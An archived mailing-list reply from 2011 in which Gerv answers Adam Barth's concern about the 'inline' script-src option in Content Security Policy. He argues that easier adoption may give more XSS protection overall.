On 24/01/11 23:50, Adam Barth wrote: > To pick on one example, adding "inline" as script-src is disaster > for security, yet its temping enough that a number of folks who've > I've seen try to use CSP decide to add it. IMHO, CSP would be better > at mitigating XSS without the "inline" option for "script-src". Well, if you don't use the 'inline' option, of course CSP is better at mitigating XSS ;-) I think you mean: "CSP would mitigate more XSS attacks if the 'inline' option for 'script-src' were not a part of the spec and not implemented." However, that's definitely a debateable point. If you make CSP to hard to adopt, fewer people will use it full stop - and so not get XSS protection, or any other protections. Allowing 'inline-src' makes the adoption curve for CSP less steep. Yes, some people will stop half way up the curve; but I would suggest that a less steep curve means that more people will persevere to the top. GervReceived on Tuesday, 25 January 2011 14:50:24 UTC
This archive was generated by hypermail 2.4.0 : Friday, 17 January 2020 18:09:25 UTC